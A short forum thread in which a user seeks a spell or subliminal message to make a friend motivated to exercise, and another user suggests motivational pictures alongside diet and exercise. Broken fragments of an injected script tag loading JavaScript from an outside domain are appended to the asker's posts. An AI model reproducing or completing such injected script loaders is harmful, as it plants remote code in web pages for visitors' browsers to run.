looking for a spell

does anyone know of or have a spell that can help one focus on a goal. I've tried a spell or two but they didn't have an effect. This is to help a friend focus on her weight loss goal, to make it So that she wants to exercise.
I am kind of wondering if hypnosis could work. but I don't have any experience with it. Or possible some sort of dream that makes her see her goal more clearly. Any advice would be helpful thank you. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Well, its not a spell. But its a motivation technique.

Tell her to photoshop her face on a body that she wants. Take printouts and paste it everywhere at home--on the fridge, on the microwave, in the bathroom, in the bedroom. She can even put one in her wallet. Ask her to set an alarm or a reminder on her phone at a time that's convenient One tip: Please be realistic while picking a the body type that's realistic. Avoid fashion models.

Ofcourse, this by itself will not work, unless you back it with a proper diet and exercise routine. Also I see no harm in visiting a weight loss specialist, if you're grossly overweight.

I was look for more of a subliminal message that will make hee feel Tuesday need to exercise. She's not grossly over weight. She just needs a little bit of motivation. I think her main problem is that she comes up with excuses of Why not. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
